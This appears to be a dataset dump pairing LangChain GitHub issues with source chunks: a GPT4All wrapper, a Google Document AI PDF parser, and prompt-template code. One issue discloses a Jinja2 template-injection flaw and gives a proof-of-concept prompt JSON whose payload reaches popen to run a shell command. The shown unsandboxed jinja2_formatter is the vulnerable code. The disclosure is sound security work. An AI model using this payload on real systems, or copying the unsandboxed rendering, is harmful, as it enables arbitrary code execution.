logits_all: bool = Field(False, alias="logits_all")
"""Return logits for all tokens, not just the last token."""
vocab_only: bool = Field(False, alias="vocab_only")
"""Only load the vocabulary, no weights.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | use_mlock: bool = Field(False, alias="use_mlock")
"""Force system to keep model in RAM."""
embedding: bool = Field(False, alias="embedding")
"""Use embedding mode only."""
n_threads: Optional[int] = Field(4, alias="n_threads")
"""Number of threads to use."""
n_predict: Optional[int] = 256
"""The maximum number of tokens to generate."""
temp: Optional[float] = 0.7
"""The temperature to use for sampling."""
top_p: Optional[float] = 0.1
"""The top-p value to use for sampling."""
top_k: Optional[int] = 40
"""The top-k value to use for sampling."""
echo: Optional[bool] = False
"""Whether to echo the prompt."""
stop: Optional[List[str]] = []
"""A list of strings to stop generation when encountered."""
repeat_last_n: Optional[int] = 64
"Last n tokens to penalize"
repeat_penalty: Optional[float] = 1.18
"""The penalty to apply to repeated tokens."""
n_batch: int = Field(8, alias="n_batch")
"""Batch size for prompt processing."""
streaming: bool = False
"""Whether to stream the results or not."""
allow_download: bool = False
"""If model does not exist in ~/.cache/gpt4all/, download it."""
client: Any = None
class Config: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Configuration for this pydantic object."""
extra = Extra.forbid
@staticmethod
def _model_param_names() -> Set[str]:
return {
"max_tokens",
"n_predict",
"top_k",
"top_p",
"temp",
"n_batch",
"repeat_penalty",
"repeat_last_n",
}
def _default_params(self) -> Dict[str, Any]:
return {
"max_tokens": self.max_tokens,
"n_predict": self.n_predict,
"top_k": self.top_k,
"top_p": self.top_p,
"temp": self.temp,
"n_batch": self.n_batch,
"repeat_penalty": self.repeat_penalty,
"repeat_last_n": self.repeat_last_n,
}
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Validate that the python package exists in the environment."""
try:
from gpt4all import GPT4All as GPT4AllModel
except ImportError:
raise ImportError(
"Could not import gpt4all python package. "
"Please install it with `pip install gpt4all`."
)
full_path = values["model"]
model_path, delimiter, model_name = full_path.rpartition("/")
model_path += delimiter
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
)
if values["n_threads"] is not None:
values["client"].model.set_thread_count(values["n_threads"])
try:
values["backend"] = values["client"].model_type
except AttributeError:
values["backend"] = values["client"].model.model_type
return values
@property
def _identifying_params(self) -> Mapping[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Get the identifying parameters."""
return {
"model": self.model,
**self._default_params(),
**{
k: v for k, v in self.__dict__.items() if k in self._model_param_names()
},
}
@property
def _llm_type(self) -> str:
"""Return the type of llm."""
return "gpt4all"
def _call( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
r"""Call out to GPT4All's generate method.
Args:
prompt: The prompt to pass into the model.
stop: A list of strings to stop generation when encountered.
Returns:
The string generated by the model.
Example:
.. code-block:: python
prompt = "Once upon a time, "
response = model(prompt, n_predict=55)
"""
text_callback = None
if run_manager:
text_callback = partial(run_manager.on_llm_new_token, verbose=self.verbose)
text = ""
params = {**self._default_params(), **kwargs}
for token in self.client.generate(prompt, **params):
if text_callback:
text_callback(token)
text += token
if stop is not None:
text = enforce_stop_tokens(text, stop)
return text |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Module contains a PDF parser based on DocAI from Google Cloud.
You need to install two libraries to use this parser:
pip install google-cloud-documentai
pip install google-cloud-documentai-toolbox
"""
import logging
import time
from dataclasses import dataclass
from typing import TYPE_CHECKING, Iterator, List, Optional, Sequence
from langchain.docstore.document import Document
from langchain.document_loaders.base import BaseBlobParser
from langchain.document_loaders.blob_loaders import Blob
from langchain.utils.iter import batch_iterate
if TYPE_CHECKING:
from google.api_core.operation import Operation
from google.cloud.documentai import DocumentProcessorServiceClient
logger = logging.getLogger(__name__)
@dataclass
class DocAIParsingResults: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """A dataclass to store DocAI parsing results."""
source_path: str
parsed_path: str
class DocAIParser(BaseBlobParser):
def __init__(
self,
*,
client: Optional["DocumentProcessorServiceClient"] = None,
location: Optional[str] = None,
gcs_output_path: Optional[str] = None,
processor_name: Optional[str] = None,
):
"""Initializes the parser.
Args:
client: a DocumentProcessorServiceClient to use
location: a GCP location where a DOcAI parser is located
gcs_output_path: a path on GCS to store parsing results
processor_name: name of a processor
You should provide either a client or location (and then a client |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | would be instantiated).
"""
if client and location:
raise ValueError(
"You should provide either a client or a location but not both "
"of them."
)
if not client and not location:
raise ValueError(
"You must specify either a client or a location to instantiate "
"a client."
)
self._gcs_output_path = gcs_output_path
self._processor_name = processor_name
if client:
self._client = client
else:
try:
from google.api_core.client_options import ClientOptions
from google.cloud.documentai import DocumentProcessorServiceClient
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
options = ClientOptions(
api_endpoint=f"{location}-documentai.googleapis.com"
)
self._client = DocumentProcessorServiceClient(client_options=options)
def lazy_parse(self, blob: Blob) -> Iterator[Document]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Parses a blob lazily.
Args:
blobs: a Blob to parse
This is a long-running operations! A recommended way is to batch
documents together and use `batch_parse` method.
"""
yield from self.batch_parse([blob], gcs_output_path=self._gcs_output_path)
def batch_parse(
self,
blobs: Sequence[Blob],
gcs_output_path: Optional[str] = None,
timeout_sec: int = 3600,
check_in_interval_sec: int = 60,
) -> Iterator[Document]:
"""Parses a list of blobs lazily.
Args:
blobs: a list of blobs to parse
gcs_output_path: a path on GCS to store parsing results
timeout_sec: a timeout to wait for DocAI to complete, in seconds
check_in_interval_sec: an interval to wait until next check
whether parsing operations have been completed, in seconds
This is a long-running operations! A recommended way is to decouple
parsing from creating Langchain Documents:
>>> operations = parser.docai_parse(blobs, gcs_path)
>>> parser.is_running(operations) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | You can get operations names and save them:
>>> names = [op.operation.name for op in operations]
And when all operations are finished, you can use their results:
>>> operations = parser.operations_from_names(operation_names)
>>> results = parser.get_results(operations)
>>> docs = parser.parse_from_results(results)
"""
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = self.docai_parse(blobs, gcs_output_path=output_path)
operation_names = [op.operation.name for op in operations]
logger.debug(
f"Started parsing with DocAI, submitted operations {operation_names}"
)
is_running, time_elapsed = True, 0
while is_running:
is_running = self.is_running(operations)
if not is_running:
break
time.sleep(check_in_interval_sec)
time_elapsed += check_in_interval_sec
if time_elapsed > timeout_sec:
raise ValueError(
"Timeout exceeded! Check operations " f"{operation_names} later!"
)
logger.debug(".")
results = self.get_results(operations=operations)
yield from self.parse_from_results(results)
def parse_from_results( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | self, results: List[DocAIParsingResults]
) -> Iterator[Document]:
try:
from google.cloud.documentai_toolbox.wrappers.document import _get_shards
from google.cloud.documentai_toolbox.wrappers.page import _text_from_layout
except ImportError:
raise ImportError(
"documentai_toolbox package not found, please install it with"
" `pip install google-cloud-documentai-toolbox`"
)
for result in results:
output_gcs = result.parsed_path.split("/")
gcs_bucket_name = output_gcs[2]
gcs_prefix = "/".join(output_gcs[3:]) + "/"
shards = _get_shards(gcs_bucket_name, gcs_prefix)
docs, page_number = [], 1
for shard in shards:
for page in shard.pages:
docs.append(
Document(
page_content=_text_from_layout(page.layout, shard.text),
metadata={
"page": page_number,
"source": result.source_path,
},
)
)
page_number += 1
yield from docs
def operations_from_names(self, operation_names: List[str]) -> List["Operation"]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Initializes Long-Running Operations from their names."""
try:
from google.longrunning.operations_pb2 import (
GetOperationRequest,
)
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install gapic-google-longrunning`"
)
operations = []
for name in operation_names:
request = GetOperationRequest(name=name)
operations.append(self._client.get_operation(request=request))
return operations
def is_running(self, operations: List["Operation"]) -> bool:
for op in operations:
if not op.done():
return True
return False
def docai_parse( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | self,
blobs: Sequence[Blob],
*,
gcs_output_path: Optional[str] = None,
batch_size: int = 4000,
enable_native_pdf_parsing: bool = True,
) -> List["Operation"]:
"""Runs Google DocAI PDF parser on a list of blobs.
Args:
blobs: a list of blobs to be parsed
gcs_output_path: a path (folder) on GCS to store results
batch_size: amount of documents per batch
enable_native_pdf_parsing: a config option for the parser
DocAI has a limit on the amount of documents per batch, that's why split a
batch into mini-batches. Parsing is an async long-running operation
on Google Cloud and results are stored in a output GCS bucket.
"""
try:
from google.cloud import documentai
from google.cloud.documentai_v1.types import OcrConfig, ProcessOptions
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
if not self._processor_name: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | raise ValueError("Processor name is not defined, aborting!")
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = []
for batch in batch_iterate(size=batch_size, iterable=blobs):
documents = []
for blob in batch:
gcs_document = documentai.GcsDocument(
gcs_uri=blob.path, mime_type="application/pdf"
)
documents.append(gcs_document)
gcs_documents = documentai.GcsDocuments(documents=documents)
input_config = documentai.BatchDocumentsInputConfig(
gcs_documents=gcs_documents
)
gcs_output_config = documentai.DocumentOutputConfig.GcsOutputConfig(
gcs_uri=output_path, field_mask=None
)
output_config = documentai.DocumentOutputConfig(
gcs_output_config=gcs_output_config
)
if enable_native_pdf_parsing:
process_options = ProcessOptions(
ocr_config=OcrConfig(
enable_native_pdf_parsing=enable_native_pdf_parsing
)
)
else:
process_options = ProcessOptions() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | request = documentai.BatchProcessRequest(
name=self._processor_name,
input_documents=input_config,
document_output_config=output_config,
process_options=process_options,
)
operations.append(self._client.batch_process_documents(request))
return operations
def get_results(self, operations: List["Operation"]) -> List[DocAIParsingResults]:
try:
from google.cloud.documentai_v1 import BatchProcessMetadata
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
results = []
for op in operations:
if isinstance(op.metadata, BatchProcessMetadata):
metadata = op.metadata
else:
metadata = BatchProcessMetadata.deserialize(op.metadata.value)
for status in metadata.individual_process_statuses:
source = status.input_gcs_source
output = status.output_gcs_destination
results.append(
DocAIParsingResults(source_path=source, parsed_path=output)
)
return results |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """BasePrompt schema definition."""
from __future__ import annotations
import warnings
from abc import ABC
from typing import Any, Callable, Dict, List, Set
from langchain.schema.messages import BaseMessage, HumanMessage
from langchain.schema.prompt import PromptValue
from langchain.schema.prompt_template import BasePromptTemplate
from langchain.utils.formatting import formatter
def jinja2_formatter(template: str, **kwargs: Any) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """Format a template using jinja2."""
try:
from jinja2 import Template
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
return Template(template).render(**kwargs)
def validate_jinja2(template: str, input_variables: List[str]) -> None:
"""
Validate that the input variables are valid for the template.
Issues a warning if missing or extra variables are found.
Args:
template: The template string.
input_variables: The input variables.
"""
input_variables_set = set(input_variables)
valid_variables = _get_jinja2_variables_from_template(template)
missing_variables = valid_variables - input_variables_set
extra_variables = input_variables_set - valid_variables
warning_message = ""
if missing_variables:
warning_message += f"Missing variables: {missing_variables} "
if extra_variables:
warning_message += f"Extra variables: {extra_variables}"
if warning_message:
warnings.warn(warning_message.strip())
def _get_jinja2_variables_from_template(template: str) -> Set[str]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
